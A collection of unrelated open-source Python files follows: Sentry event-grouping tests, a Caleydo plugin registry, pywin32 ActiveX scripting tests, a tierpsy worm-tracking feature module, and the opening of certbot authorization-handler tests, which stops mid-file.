self.assertEquals(group.messagefiltervalue_set.filter(key='site').count(), 1)
res = group.messagefiltervalue_set.filter(key='site').get()
self.assertEquals(res.value, 'foo')
self.assertEquals(res.times_seen, 2)
event = Group.objects.from_kwargs(1, message='foo', site='bar')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='site').count(), 2)
results = list(group.messagefiltervalue_set.filter(key='site').order_by('id'))
res = results[0]
self.assertEquals(res.value, 'foo')
self.assertEquals(res.times_seen, 2)
res = results[1]
self.assertEquals(res.value, 'bar')
self.assertEquals(res.times_seen, 1)
def test_server_name_filter(self):
event = Group.objects.from_kwargs(1, message='foo')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 0)
event = Group.objects.from_kwargs(1, message='foo', server_name='foo')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 1)
res = group.messagefiltervalue_set.filter(key='server_name').get()
self.assertEquals(res.value, 'foo')
self.assertEquals(res.times_seen, 1)
event = Group.objects.from_kwargs(1, message='foo', server_name='foo')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 1)
res = group.messagefiltervalue_set.filter(key='server_name').get()
self.assertEquals(res.value, 'foo')
self.assertEquals(res.times_seen, 2)
event = Group.objects.from_kwargs(1, message='foo', server_name='bar')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 2)
results = list(group.messagefiltervalue_set.filter(key='server_name').order_by('id'))
res = results[0]
self.assertEquals(res.value, 'foo')
self.assertEquals(res.times_seen, 2)
res = results[1]
self.assertEquals(res.value, 'bar')
self.assertEquals(res.times_seen, 1)
@mock.patch('sentry.manager.GroupManager.add_tags')
def test_tags_as_list(self, add_tags):
event = Group.objects.from_kwargs(1, message='foo', tags=[('foo', 'bar')])
group = event.group
add_tags.assert_called_once_with(group, [('foo', 'bar'), ('logger', 'root')])
@mock.patch('sentry.manager.GroupManager.add_tags')
def test_tags_as_dict(self, add_tags):
event = Group.objects.from_kwargs(1, message='foo', tags={'foo': 'bar'})
group = event.group
add_tags.assert_called_once_with(group, [('foo', 'bar'), ('logger', 'root')])
def test_dupe_message_id(self):
event = Group.objects.from_kwargs(1, event_id=1, message='foo')
self.assertEquals(event.message, 'foo')
self.assertEquals(event.project_id, 1)
self.assertEquals(Event.objects.count(), 1)
# ensure that calling it again doesnt raise a db error
Group.objects.from_kwargs(1, event_id=1, message='foo')
self.assertEquals(Event.objects.count(), 1)
def test_does_update_messagecountbyminute(self):
event = Group.objects.from_kwargs(1, message='foo')
inst = MessageCountByMinute.objects.filter(group=event.group)
self.assertTrue(inst.exists())
inst = inst.get()
self.assertEquals(inst.times_seen, 1)
event = Group.objects.from_kwargs(1, message='foo')
inst = MessageCountByMinute.objects.get(group=event.group)
self.assertEquals(inst.times_seen, 2)
def test_does_update_projectcountbyminute(self):
event = Group.objects.from_kwargs(1, message='foo')
inst = ProjectCountByMinute.objects.filter(project=event.project)
self.assertTrue(inst.exists())
inst = inst.get()
self.assertEquals(inst.times_seen, 1)
event = Group.objects.from_kwargs(1, message='foo')
inst = ProjectCountByMinute.objects.get(project=event.project)
self.assertEquals(inst.times_seen, 2)
def test_updates_group(self):
Group.objects.from_kwargs(1, message='foo', checksum='a' * 32)
event = Group.objects.from_kwargs(1, message='foo bar', checksum='a' * 32)
group = Group.objects.get(pk=event.group_id)
self.assertEquals(group.times_seen, 2)
self.assertEquals(group.last_seen.replace(microsecond=0), event.datetime.replace(microsecond=0))
self.assertEquals(group.message, 'foo bar')
def test_get_accelerrated(self):
if not has_trending():
return
group = Group.objects.from_kwargs(1, message='foo', checksum='a' * 32).group
group_list = list(Group.objects.get_accelerated(Group.objects.all(), minutes=settings.MINUTE_NORMALIZATION)[0:100])
self.assertEquals(len(group_list), 1)
self.assertEquals(group_list[0], group)
def test_add_tags(self):
event = Group.objects.from_kwargs(1, message='rrr')
group = event.group
Group.objects.add_tags(group, tags=(('foo', 'bar'), ('foo', 'baz'), ('biz', 'boz')))
self.assertEquals(group.messagefiltervalue_set.filter(key='foo').count(), 2)
results = list(group.messagefiltervalue_set.filter(key='foo').order_by('id'))
res = results[0]
self.assertEquals(res.value, 'bar')
self.assertEquals(res.times_seen, 1)
res = results[1]
self.assertEquals(res.value, 'baz')
self.assertEquals(res.times_seen, 1)
self.assertEquals(group.messagefiltervalue_set.filter(key='biz').count(), 1)
results = list(group.messagefiltervalue_set.filter(key='biz').order_by('id'))
res = results[0]
self.assertEquals(res.value, 'boz')
self.assertEquals(res.times_seen, 1)
class SearchManagerTest(TestCase):
def test_search(self):
project = Project.objects.all()[0]
group = Group.objects.create(project=project, message='foo', checksum='a' * 32)
doc = SearchDocument.objects.create(
project=project,
group=group,
status=group.status,
total_events=1,
date_added=group.first_seen,
date_changed=group.last_seen,
)
doc.token_set.create(
field='text',
token='foo',
)
results = list(SearchDocument.objects.search(project, query='foo'))
self.assertEquals(len(results), 1)
# This uses a raw query set so we have to check the id
self.assertEquals(results[0].id, doc.id)
|
|
###############################################################################
# Caleydo - Visualization for Molecular Biology - http://caleydo.org
# Copyright (c) The Caleydo Team. All rights reserved.
# Licensed under the new BSD license, available at http://caleydo.org/license
###############################################################################
from builtins import object
import logging
from functools import cmp_to_key
_registry = None
def _get_registry():
global _registry
if _registry is None:
from ._plugin_parser import parse
metadata = parse()
from .config import merge_plugin_configs, _c, _initialize
# check initialization
if _c is None:
_initialize()
merge_plugin_configs(metadata.plugins)
_registry = Registry(metadata.plugins, metadata.server_extensions, metadata)
return _registry
class Extension(object):
"""
the loaded plugin instance
"""
def __init__(self, desc, impl):
self.desc = desc
self.impl = impl
self._cache = None
def __call__(self, *args, **kwargs):
"""
access and call the factory method of this plugin
"""
if getattr(self.desc, 'singleton', False) and self._cache is not None:
return self._cache
m = getattr(self.impl, self.desc.factory)
if hasattr(m, '__call__'):
v = m(*args, **kwargs)
else:
v = m
self._cache = v
return v
def factory(self, *args, **kwargs):
return self(*args, **kwargs)
class AExtensionDesc(object):
def __init__(self, desc):
self.type = desc.get('type', 'unknown')
self.id = desc['id']
self.name = self.id
self.factory = 'create'
self.file = 'main'
self.version = '1.0'
self.description = ''
# copy all values
for key, value in desc.items():
self.__dict__[key] = value
class ExtensionDesc(AExtensionDesc):
"""
plugin description
"""
def __init__(self, desc):
super(ExtensionDesc, self).__init__(desc)
self._impl = None
# from js notation to python notation
self.module = self.module.replace('/', '.')
def load(self):
if self._impl is None:
import importlib
_log = logging.getLogger(__name__)
_log.info('importing %s', self.module)
m = importlib.import_module(self.module)
if hasattr(m, '_plugin_initialize'): # init method
# import inspect
# inspect.getcallargs()
m._plugin_initialize()
self._impl = Extension(self, m)
return self._impl
class PreLoadedExtensionDesc(AExtensionDesc):
def __init__(self, desc, impl):
super(PreLoadedExtensionDesc, self).__init__(desc)
self._wrapper = PreLoadedExtension(impl)
def load(self):
return self._wrapper
class PreLoadedExtension(object):
def __init__(self, impl):
self._impl = impl
def __call__(self, *args, **kwargs):
return self._impl
def factory(self, *args, **kwargs):
return self._impl
class Registry(object):
def __init__(self, plugins, extensions, metadata):
self.plugins = plugins
self.metadata = metadata
self._extensions = [ExtensionDesc(p) for p in extensions]
self._extensions.append(PreLoadedExtensionDesc(dict(type='manager', id='registry'), self))
self._singletons = None
@property
def singletons(self):
import collections
from . import config
# check initialization
_log = logging.getLogger(__name__)
if self._singletons is not None:
return self._singletons
def loader(e):
return lambda: e.load().factory()
# select singleton impl with lowest priority default 100
mm = collections.defaultdict(lambda: [])
for e in self._extensions:
if e.type == 'manager':
mm[e.id].append(e)
if config._c is None:
config._initialize()
cc = config.view('phovea_server._runtime')
current_command = cc.get('command', default='unknown')
_log.info('read currently executed command from config: %s', current_command)
def compare(a, b):
a_prio = getattr(a, 'priority', 100)
a_command = getattr(a, 'command', None)
b_prio = getattr(b, 'priority', 100)
b_command = getattr(b, 'command', None)
# if the command matches the current command this has priority
if a_command != b_command:
if a_command == current_command:
return -1
elif b_command == current_command:
return 1
return a_prio - b_prio
def select(v):
v = sorted(v, key=cmp_to_key(compare))
_log.info('creating singleton %s %s', v[0].id, getattr(v[0], 'module', 'server'))
return loader(v[0])
self._singletons = {k: select(v) for k, v in mm.items()}
return self._singletons
def __len__(self):
return len(self._extensions)
def __getitem__(self, item):
return self._extensions[item]
def __iter__(self):
return iter(self._extensions)
def list(self, plugin_type=None):
if plugin_type is None:
return self
if not hasattr(plugin_type, '__call__'): # not a callable
return [x for x in self if x.type == plugin_type]
return [x for x in self if plugin_type(x)]
def lookup(self, singleton_id):
if singleton_id in self.singletons:
return self.singletons[singleton_id]()
return None
def list(plugin_type=None):
return _get_registry().list(plugin_type)
def lookup(singleton_id):
return _get_registry().lookup(singleton_id)
def plugins():
return _get_registry().plugins
def metadata():
return _get_registry().metadata
|
|
import sys
import pythoncom
from win32com.axscript.server.error import Exception
from win32com.axscript import axscript
from win32com.axscript.server import axsite
from win32com.server import util, connect
import win32com.server.policy
from win32com.client.dynamic import Dispatch
from win32com.server.exception import COMException
import unittest
import win32com.test.util
verbose = "-v" in sys.argv
class MySite(axsite.AXSite):
def __init__(self, *args):
self.exception_seen = None
axsite.AXSite.__init__(self, *args)
def OnScriptError(self, error):
self.exception_seen = exc = error.GetExceptionInfo()
context, line, char = error.GetSourcePosition()
if not verbose:
return
print " >Exception:", exc[1]
try:
st = error.GetSourceLineText()
except pythoncom.com_error:
st = None
if st is None: st = ""
text = st + "\n" + (" " * (char-1)) + "^" + "\n" + exc[2]
for line in text.splitlines():
print " >" + line
class MyCollection(util.Collection):
def _NewEnum(self):
return util.Collection._NewEnum(self)
class Test:
_public_methods_ = [ 'echo', 'fail' ]
_public_attrs_ = ['collection']
def __init__(self):
self.verbose = verbose
self.collection = util.wrap( MyCollection( [1,'Two',3] ))
self.last = ""
self.fail_called = 0
# self._connect_server_ = TestConnectServer(self)
def echo(self, *args):
self.last = "".join([str(s) for s in args])
if self.verbose:
for arg in args:
print arg,
print
def fail(self, *args):
print "**** fail() called ***"
for arg in args:
print arg,
print
self.fail_called = 1
# self._connect_server_.Broadcast(last)
#### Connections currently wont work, as there is no way for the engine to
#### know what events we support. We need typeinfo support.
IID_ITestEvents = pythoncom.MakeIID("{8EB72F90-0D44-11d1-9C4B-00AA00125A98}")
class TestConnectServer(connect.ConnectableServer):
_connect_interfaces_ = [IID_ITestEvents]
# The single public method that the client can call on us
# (ie, as a normal COM server, this exposes just this single method.
def __init__(self, object):
self.object = object
def Broadcast(self,arg):
# Simply broadcast a notification.
self._BroadcastNotify(self.NotifyDoneIt, (arg,))
def NotifyDoneIt(self, interface, arg):
interface.Invoke(1000, 0, pythoncom.DISPATCH_METHOD, 1, arg)
VBScript = """\
prop = "Property Value"
sub hello(arg1)
test.echo arg1
end sub
sub testcollection
if test.collection.Item(0) <> 1 then
test.fail("Index 0 was wrong")
end if
if test.collection.Item(1) <> "Two" then
test.fail("Index 1 was wrong")
end if
if test.collection.Item(2) <> 3 then
test.fail("Index 2 was wrong")
end if
num = 0
for each item in test.collection
num = num + 1
next
if num <> 3 then
test.fail("Collection didn't have 3 items")
end if
end sub
"""
PyScript = u"""\
# A unicode \xa9omment.
prop = "Property Value"
def hello(arg1):
test.echo(arg1)
def testcollection():
# test.collection[1] = "New one"
got = []
for item in test.collection:
got.append(item)
if got != [1, "Two", 3]:
test.fail("Didn't get the collection")
pass
"""
# XXX - needs py3k work! Throwing a bytes string with an extended char
# doesn't make much sense, but py2x allows it. What it gets upset with
# is a real unicode arg - which is the only thing py3k allows!
PyScript_Exc = u"""\
def hello(arg1):
raise RuntimeError("exc with extended \xa9har")
"""
ErrScript = """\
bad code for everyone!
"""
state_map = {
axscript.SCRIPTSTATE_UNINITIALIZED: "SCRIPTSTATE_UNINITIALIZED",
axscript.SCRIPTSTATE_INITIALIZED: "SCRIPTSTATE_INITIALIZED",
axscript.SCRIPTSTATE_STARTED: "SCRIPTSTATE_STARTED",
axscript.SCRIPTSTATE_CONNECTED: "SCRIPTSTATE_CONNECTED",
axscript.SCRIPTSTATE_DISCONNECTED: "SCRIPTSTATE_DISCONNECTED",
axscript.SCRIPTSTATE_CLOSED: "SCRIPTSTATE_CLOSED",
}
def _CheckEngineState(engine, name, state):
got = engine.engine.eScript.GetScriptState()
if got != state:
got_name = state_map.get(got, str(got))
state_name = state_map.get(state, str(state))
raise RuntimeError("Warning - engine %s has state %s, but expected %s" % (name, got_name, state_name))
class EngineTester(win32com.test.util.TestCase):
def _TestEngine(self, engineName, code, expected_exc = None):
echoer = Test()
model = {
'test' : util.wrap(echoer),
}
site = MySite(model)
engine = site._AddEngine(engineName)
try:
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
engine.AddCode(code)
engine.Start()
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_STARTED)
self.failUnless(not echoer.fail_called, "Fail should not have been called")
# Now call into the scripts IDispatch
ob = Dispatch(engine.GetScriptDispatch())
try:
ob.hello("Goober")
self.failUnless(expected_exc is None,
"Expected %r, but no exception seen" % (expected_exc,))
except pythoncom.com_error:
if expected_exc is None:
self.fail("Unexpected failure from script code: %s" % (site.exception_seen,))
if expected_exc not in site.exception_seen[2]:
self.fail("Could not find %r in %r" % (expected_exc, site.exception_seen[2]))
return
self.assertEqual(echoer.last, "Goober")
self.assertEqual(str(ob.prop), "Property Value")
ob.testcollection()
self.failUnless(not echoer.fail_called, "Fail should not have been called")
# Now make sure my engines can evaluate stuff.
result = engine.eParse.ParseScriptText("1+1", None, None, None, 0, 0, axscript.SCRIPTTEXT_ISEXPRESSION)
self.assertEqual(result, 2)
# re-initialize to make sure it transitions back to initialized again.
engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
engine.Start()
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_STARTED)
# Transition back to initialized, then through connected too.
engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
engine.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_CONNECTED)
engine.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_INITIALIZED)
engine.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_CONNECTED)
engine.SetScriptState(axscript.SCRIPTSTATE_DISCONNECTED)
_CheckEngineState(site, engineName, axscript.SCRIPTSTATE_DISCONNECTED)
finally:
engine.Close()
engine = None
site = None
def testVB(self):
self._TestEngine("VBScript", VBScript)
def testPython(self):
self._TestEngine("Python", PyScript)
def testPythonUnicodeError(self):
self._TestEngine("Python", PyScript)
def testVBExceptions(self):
self.assertRaises(pythoncom.com_error,
self._TestEngine, "VBScript", ErrScript)
def testPythonExceptions(self):
expected = u"RuntimeError: exc with extended \xa9har"
self._TestEngine("Python", PyScript_Exc, expected)
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 2 19:15:50 2017
@author: ajaver
"""
from tierpsy.analysis.stage_aligment.alignStageMotion import isGoodStageAligment, _h_get_stage_inv
from tierpsy.helper.params import read_fps, read_microns_per_pixel, read_ventral_side
from tierpsy import AUX_FILES_DIR
import tierpsy.features.open_worm_analysis_toolbox as mv
import copy
import numpy as np
import pandas as pd
import tables
import warnings
import os
from collections import OrderedDict
from scipy.signal import savgol_filter
# (http://www.pytables.org/usersguide/parameter_files.html)
tables.parameters.MAX_COLUMNS = 1024
def _h_smooth_curve(curve, window=5, pol_degree=3):
'''smooth curves using the savgol_filter'''
if curve.shape[0] < window:
# nothing to do here return an empty array
return np.full_like(curve, np.nan)
# consider the case of one (widths) or two dimensions (skeletons, contours)
if curve.ndim == 1:
smoothed_curve = savgol_filter(curve, window, pol_degree)
else:
smoothed_curve = np.zeros_like(curve)
for nn in range(curve.ndim):
smoothed_curve[:, nn] = savgol_filter(
curve[:, nn], window, pol_degree)
return smoothed_curve
def _h_smooth_curve_all(curves, window=5, pol_degree=3):
for ii in range(curves.shape[0]):
if not np.any(np.isnan(curves[ii])):
curves[ii] = _h_smooth_curve(
curves[ii], window=window, pol_degree=pol_degree)
return curves
class WormFromTableSimple():
def __init__(self,
file_name,
worm_index,
use_skel_filter=True,
worm_index_type='worm_index_joined',
smooth_window=-1,
POL_DEGREE_DFLT=3):
# Populates an empty normalized worm.
#if it does not exists return 1 as a default, like that we can still calculate the features in pixels and frames, instead of micrometers and seconds.
self.microns_per_pixel = read_microns_per_pixel(file_name, dflt=1)
self.fps = read_fps(file_name, dflt=1)
# savitzky-golay filter polynomial order default
self.POL_DEGREE_DFLT = POL_DEGREE_DFLT
# save the input parameters
self.file_name = file_name
self.worm_index = worm_index
self.use_skel_filter = use_skel_filter
self.worm_index_type = worm_index_type
# set to less than POL_DEGREE_DFLT to eliminate smoothing
self.smooth_window = smooth_window
# smooth window must be an odd number larger than the polynomial degree
# (savitzky-golay filter requirement)
if self.smooth_window >= self.POL_DEGREE_DFLT and self.smooth_window % 2 == 0:
self.smooth_window += 1
self.ventral_side = 'unknown'
self._h_read_data()
# smooth data if required
if self.smooth_window > self.POL_DEGREE_DFLT:
# print('Smoothing...')
self.skeleton = _h_smooth_curve_all(
self.skeleton, window=self.smooth_window)
self.widths = _h_smooth_curve_all(
self.widths, window=self.smooth_window)
# assert the dimenssions of the read data are correct
self._h_assert_data_dim()
def _h_get_table_indexes(self):
'''
Get the relevant info from the trajectory_data table for a single worm. skeleton_id, timestamp.
'''
# intialize just to make clear the relevant variables for this function
with pd.HDFStore(self.file_name, 'r') as ske_file_id:
trajectories_data_f = ske_file_id['/trajectories_data']
# get the rows of valid skeletons
assert self.worm_index_type in trajectories_data_f
good = trajectories_data_f[self.worm_index_type] == self.worm_index
trajectories_data = trajectories_data_f.loc[good]
try:
# try to read the time stamps, if there are repeated or not a
# number use the frame nuber instead
timestamp_raw = trajectories_data['timestamp_raw'].values
if np.any(np.isnan(timestamp_raw)):
raise ValueError
else:
timestamp_inds = timestamp_raw.astype(np.int)
#deal in the case they are repeating indexes (this happends sometimes in the last frame)
timestamp_inds, ind = np.unique(timestamp_inds, return_index=True)
trajectories_data = trajectories_data.iloc[ind]
except (ValueError, KeyError):
# if the time stamp fails use the frame_number value instead
# (the index of the mask) and return nan as the fps
timestamp_inds = trajectories_data['frame_number'].values
skel_table_id = trajectories_data['skeleton_id'].values
# we need to use (.values) to be able to use the & operator
good_skeletons = (trajectories_data['has_skeleton'] == 1).values
if self.use_skel_filter and 'is_good_skel' in trajectories_data:
# only keep skeletons that where labeled as good skeletons in
# the filtering step
good_skeletons &= (
trajectories_data['is_good_skel'] == 1).values
skel_table_id = skel_table_id[good_skeletons]
timestamp_inds = timestamp_inds[good_skeletons]
return skel_table_id, timestamp_inds
def _h_read_data(self):
skel_table_id, timestamp_inds = self._h_get_table_indexes()
if not np.array_equal(np.sort(timestamp_inds), timestamp_inds): #the time stamp must be sorted
warnings.warn('{}: The timestamp is not sorted in worm_index {}'.format(self.file_name, self.worm_index))
# use real frames to define the size of the object arrays
first_frame = np.min(timestamp_inds)
last_frame = np.max(timestamp_inds)
n_frames = last_frame - first_frame + 1
# get the apropiate index in the object array
ind_ff = timestamp_inds - first_frame
# get the number of segments from the normalized skeleton
with tables.File(self.file_name, 'r') as ske_file_id:
self.n_segments = ske_file_id.get_node('/skeleton').shape[1]
# add the data from the skeleton_id's and timestamps used
self.timestamp = np.arange(first_frame, last_frame + 1)
self.skeleton_id = np.full(n_frames, -1, np.int32)
self.skeleton_id[ind_ff] = skel_table_id
# initialize the rest of the arrays
self.skeleton = np.full((n_frames, self.n_segments, 2), np.nan)
self.ventral_contour = np.full((n_frames, self.n_segments, 2), np.nan)
self.dorsal_contour = np.full((n_frames, self.n_segments, 2), np.nan)
self.widths = np.full((n_frames, self.n_segments), np.nan)
# read data from the skeletons table
with tables.File(self.file_name, 'r') as ske_file_id:
self.skeleton[ind_ff] = \
ske_file_id.get_node('/skeleton')[skel_table_id, :, :] * self.microns_per_pixel
self.ventral_contour[ind_ff] = \
ske_file_id.get_node('/contour_side1')[skel_table_id, :, :] * self.microns_per_pixel
self.dorsal_contour[ind_ff] = \
ske_file_id.get_node('/contour_side2')[skel_table_id, :, :] * self.microns_per_pixel
self.widths[ind_ff] = \
ske_file_id.get_node('/contour_width')[skel_table_id, :] * self.microns_per_pixel
def _h_assert_data_dim(self):
# assertions to check the data has the proper dimensions
fields2check = [
'skeleton',
'widths',
'ventral_contour',
'dorsal_contour']
for field in fields2check:
A = getattr(self, field)
assert A.shape[0] == self.n_frames
if A.ndim >= 2:
assert A.shape[1] == self.n_segments
if A.ndim == 3:
assert A.shape[2] == 2
@property
def n_valid_skel(self):
# calculate the number of valid skeletons
return np.sum(~np.isnan(self.skeleton[:, 0, 0]))
@property
def n_frames(self):
return self.timestamp.size
@property
def last_frame(self):
return self.timestamp[-1]
@property
def first_frame(self):
return self.timestamp[0]
class WormFromTable(WormFromTableSimple):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def split(self, split_size):
'''subdivide so I do not have to start at the begining of a trajectory
(it is more likely that there was an error here)
'''
remainder = self.n_frames % split_size
if remainder == 0:
ini_split = split_size
else:
ini_split = remainder//2
#get the indexes to made the splits
split_ind = np.arange(ini_split, self.n_frames, split_size, dtype=np.int)
n_splits = split_ind.size + 1
#get the fields that will be splitted, they should be ndarrays with the same number of elements in the fisrt dimension
fields2split = [field for field, val in self.__dict__.items() if isinstance(val, np.ndarray)]
# check all the fields have the same number of frames in the first dimension
assert all(getattr(self, x).shape[0] for x in fields2split)
#copy the main object to initialize the smaller trajectories
base_worm =copy.copy(self)
#delete the ndarray fields so we don't copy large amount of data twice
[setattr(base_worm, x, np.nan) for x in fields2split]
#split each fields
splitted_worms = [copy.copy(base_worm) for n in range(n_splits)]
for field in fields2split:
splitted_field = np.split(getattr(self, field), split_ind, axis=0)
for worm_s, dat_s in zip(splitted_worms, splitted_field):
setattr(worm_s, field, dat_s)
return splitted_worms
def to_open_worm(self):
'''
Return a NormalizedWorm object compatible with the openworm toolbox
'''
def _chage_axis(x):
A = np.rollaxis(x, 0, x.ndim)
return np.asfortranarray(A)
fields = [
'skeleton',
'widths',
'ventral_contour',
'dorsal_contour']
args = [_chage_axis(getattr(self, ff)) for ff in fields]
nw = mv.NormalizedWorm.from_normalized_array_factory(*args)
nw.video_info.fps = self.fps
nw.video_info.set_ventral_mode(self.ventral_side)
if nw.video_info.ventral_mode != 0:
#check that the contour orientation and the ventral_mode are the same
signed_a = nw.signed_area[np.argmax(~np.isnan(nw.signed_area))] #first element not nan
if signed_a < 0:
assert nw.video_info.ventral_mode == 2 #anticlockwise
else:
assert nw.video_info.ventral_mode == 1
return nw
def correct_schafer_worm(self):
if hasattr(self, 'stage_vec_inv'):
print('The worm has been previously corrected. The attribute "stage_vec_inv" exists. ')
return
self.ventral_side = read_ventral_side(self.file_name)
assert isGoodStageAligment(self.file_name)
self.stage_vec_inv, _ = _h_get_stage_inv(self.file_name, self.timestamp)
#remove data where the stage is moving (the blurred image can induce artifacts)
self.is_stage_move = np.isnan(self.stage_vec_inv[:,0])
self.widths[self.is_stage_move, :] = np.nan
for field in ['skeleton', 'ventral_contour', 'dorsal_contour']:
if hasattr(self, field):
tmp_dat = getattr(self, field)
# rotate the skeletons
# for ii in range(tot_skel):
#tmp_dat[ii] = np.dot(rotation_matrix, tmp_dat[ii].T).T
tmp_dat = tmp_dat + self.stage_vec_inv[:, np.newaxis, :]
setattr(self, field, tmp_dat)
class WormStats():
def __init__(self):
'''get the info for each feature chategory'''
feat_names_file = os.path.join(AUX_FILES_DIR, 'features_names.csv')
#feat_names_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'aux', 'features_names.csv')
self.extra_fields = ['worm_index', 'n_frames', 'n_valid_skel', 'first_frame']
self.features_info = pd.read_csv(feat_names_file, index_col=0)
self.builtFeatAvgNames() # create self.feat_avg_names
# get files that would be used in the construction of objects
self.feat_avg_dtype = [(x, np.float32) for x in self.feat_avg_names]
self.feat_timeseries = list(
self.features_info[
self.features_info['is_time_series'] == 1].index.values)
extra_fields = ['worm_index', 'timestamp', 'skeleton_id', 'motion_modes']
timeseries_fields = extra_fields + self.feat_timeseries
self.feat_timeseries_dtype = [(x, np.float32) for x in timeseries_fields]
self.feat_events = list(
self.features_info[
self.features_info['is_time_series'] == 0].index.values)
def builtFeatAvgNames(self):
feat_avg_names = self.extra_fields[:]
for feat_name, feat_info in self.features_info.iterrows():
motion_types = ['']
if feat_info['is_time_series']:
motion_types += ['_forward', '_paused', '_backward']
for mtype in motion_types:
sub_name = feat_name + mtype
feat_avg_names.append(sub_name)
if feat_info['is_signed']:
for atype in ['_abs', '_neg', '_pos']:
feat_avg_names.append(sub_name + atype)
self.feat_avg_names = feat_avg_names
def getFieldData(worm_features, name):
data = worm_features
for field in name.split('.'):
data = getattr(data, field)
return data
def getWormStats(self, worm_features, stat_func=np.mean):
''' Calculate the statistics of an object worm features, subdividing data
into Backward/Forward/Paused and/or Positive/Negative/Absolute, when appropiated.
The default is to calculate the mean value, but this can be changed
using stat_func.
Return the feature list as an ordered dictionary.
'''
if isinstance(worm_features, (dict, pd.DataFrame)):
def read_feat(feat_name):
if feat_name in worm_features:
return worm_features[feat_name]
else:
return None
motion_mode = read_feat('motion_modes')
else:
def read_feat(feat_name):
feat_obj = self.features_info.loc[feat_name, 'feat_name_obj']
if feat_obj in worm_features._features:
return worm_features._features[feat_obj].value
else:
return None
motion_mode = worm_features._features['locomotion.motion_mode'].value
# return data as a numpy recarray
feat_stats = np.full(1, np.nan, dtype=self.feat_avg_dtype)
for feat_name, feat_props in self.features_info.iterrows():
tmp_data = read_feat(feat_name)
if tmp_data is None:
feat_stats[feat_name] = np.nan
elif isinstance(tmp_data, (int, float)):
feat_stats[feat_name] = tmp_data
else:
feat_avg = self._featureStat(
stat_func,
tmp_data,
feat_name,
feat_props['is_signed'],
feat_props['is_time_series'],
motion_mode)
for feat_avg_name in feat_avg:
feat_stats[feat_avg_name] = feat_avg[feat_avg_name]
return feat_stats
@staticmethod
def _featureStat(
stat_func,
data,
name,
is_signed,
is_time_series,
motion_mode=np.zeros(0)):
# I prefer to keep this function quite independend and pass the stats and moition_mode argument
# rather than save those values in the class
if data is None:
data = np.zeros(0)
#filter nan data
valid = ~np.isnan(data)
data = data[valid]
motion_types = OrderedDict()
motion_types['all'] = np.nan
if is_time_series:
# if the the feature is motion type we can subdivide in Forward,
# Paused or Backward motion
motion_mode = motion_mode[valid]
assert motion_mode.size == data.size
motion_types['forward'] = motion_mode == 1
motion_types['paused'] = motion_mode == 0
motion_types['backward'] = motion_mode == -1
stats = OrderedDict()
for key in motion_types:
if key == 'all':
sub_name = name
valid_data = data
else:
sub_name = name + '_' + key
#filter by an specific motion type
valid_data = data[motion_types[key]]
assert not np.any(np.isnan(valid_data))
stats[sub_name] = stat_func(valid_data)
if is_signed:
# if the feature is signed we can subdivide in positive,
# negative and absolute
stats[sub_name + '_abs'] = stat_func(np.abs(valid_data))
neg_valid = (valid_data < 0)
stats[sub_name + '_neg'] = stat_func(valid_data[neg_valid])
pos_valid = (valid_data > 0)
stats[sub_name + '_pos'] = stat_func(valid_data[pos_valid])
return stats
if __name__ == '__main__':
main_dir = '/Users/ajaver/OneDrive - Imperial College London/Local_Videos/single_worm/global_sample_v3/'
base_name = 'N2 on food R_2011_09_13__11_59___3___3'
skel_file = os.path.join(main_dir, base_name + '_skeletons.hdf5')
worm = WormFromTable(skel_file, 1)
|
|
"""Tests for certbot.auth_handler."""
import functools
import logging
import unittest
import mock
from acme import challenges
from acme import client as acme_client
from acme import messages
from certbot import achallenges
from certbot import errors
from certbot import le_util
from certbot.tests import acme_util
class ChallengeFactoryTest(unittest.TestCase):
# pylint: disable=protected-access
def setUp(self):
from certbot.auth_handler import AuthHandler
# Account is mocked...
self.handler = AuthHandler(None, None, mock.Mock(key="mock_key"))
self.dom = "test"
self.handler.authzr[self.dom] = acme_util.gen_authzr(
messages.STATUS_PENDING, self.dom, acme_util.CHALLENGES,
[messages.STATUS_PENDING] * 6, False)
def test_all(self):
achalls = self.handler._challenge_factory(
self.dom, range(0, len(acme_util.CHALLENGES)))
self.assertEqual(
[achall.chall for achall in achalls], acme_util.CHALLENGES)
def test_one_tls_sni(self):
achalls = self.handler._challenge_factory(self.dom, [1])
self.assertEqual(
[achall.chall for achall in achalls], [acme_util.TLSSNI01])
def test_unrecognized(self):
self.handler.authzr["failure.com"] = acme_util.gen_authzr(
messages.STATUS_PENDING, "failure.com",
[mock.Mock(chall="chall", typ="unrecognized")],
[messages.STATUS_PENDING])
self.assertRaises(
errors.Error, self.handler._challenge_factory, "failure.com", [0])
class GetAuthorizationsTest(unittest.TestCase):
"""get_authorizations test.
This tests everything except for all functions under _poll_challenges.
"""
def setUp(self):
from certbot.auth_handler import AuthHandler
self.mock_auth = mock.MagicMock(name="ApacheConfigurator")
self.mock_auth.get_chall_pref.return_value = [challenges.TLSSNI01]
self.mock_auth.perform.side_effect = gen_auth_resp
self.mock_account = mock.Mock(key=le_util.Key("file_path", "PEM"))
self.mock_net = mock.MagicMock(spec=acme_client.Client)
self.handler = AuthHandler(
self.mock_auth, self.mock_net, self.mock_account)
logging.disable(logging.CRITICAL)
def tearDown(self):
logging.disable(logging.NOTSET)
@mock.patch("certbot.auth_handler.AuthHandler._poll_challenges")
